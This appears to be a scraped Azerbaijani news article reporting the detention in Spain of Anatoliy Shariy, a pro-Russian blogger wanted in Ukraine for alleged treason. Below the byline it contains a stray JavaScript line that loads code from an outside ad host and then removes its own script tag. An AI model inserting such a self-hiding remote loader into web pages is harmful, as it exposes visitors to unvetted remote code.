Məşhur ukraynalı bloqer İspaniyada həbs edildi

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

İspaniyada Ukraynada vətənə xəyanətdə şübhəli bilinərək axtarışa verilən rusiyapərəst bloqer Anatoli Şariy saxlanılıb.

“Bu, Ukrayna Təhlükəsizlik Xidmətinin beynəlxalq tərəfdaşlarla sıx və qarşılıqlı əlaqəsi nəticəsində mümkün olub. Bu həbs Ukraynaya xəyanət edən hər bir şəxsin gec-tez layiqli cəzasını alacağına dair sübutdur”, – Ukrayna xüsusi xidmət orqanlarının məlumatında deyilir.

Qeyd edək ki, “YouTube”da üç milyona yaxın abunəçisi olan Anatoli Şariy 2021-ci ildən beynəlxalq axtarışa verilmişdi.

O, xüsusən Ukraynada baş vermiş “Maydan” hadisələrini, həmçinin sabiq prezident Petro Poroşenkonun və hazırkı Prezident Volodimir Zelenskinin siyasətini sərt tənqid edir.

Mənbə: Unian

Oxu.az

Bu yazılara da göz atın...